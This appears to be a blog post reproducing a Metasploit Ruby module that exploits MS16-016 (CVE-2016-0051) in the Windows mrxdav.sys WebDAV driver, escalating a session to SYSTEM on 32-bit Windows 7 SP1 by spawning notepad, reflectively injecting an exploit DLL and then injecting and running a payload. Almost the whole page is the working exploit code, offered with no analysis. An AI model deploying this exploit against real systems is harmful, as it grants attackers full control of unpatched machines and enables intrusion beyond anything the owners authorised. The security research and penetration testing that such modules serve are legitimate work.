Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863542386

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
      'Description'    => %q{
        This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
        a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
        the specified payload within the context of the elevated process.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tamas Koczka',                               # Original Exploit
          'William Webb <william_webb[at]rapid7.com>'   # C port and Metasploit module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => 'false'
        },
      'Targets'        =>
        [
          [ 'Windows 7 SP1', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2016-0051' ],
          [ 'MSB', 'MS16-016'  ]
        ],
      'DisclosureDate' => 'Feb 09 2016',
      'DefaultTarget'  => 0
    }))
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Launching notepad to host the exploit...")
    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
    begin
      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_status("Operation failed. Hosting exploit in the current process...")
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
    library_path = ::File.expand_path(library_path)
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected ... injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
    thread = process.thread.create(exploit_mem + offset, payload_mem)
    sleep(3)
    print_status("Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
  end
 end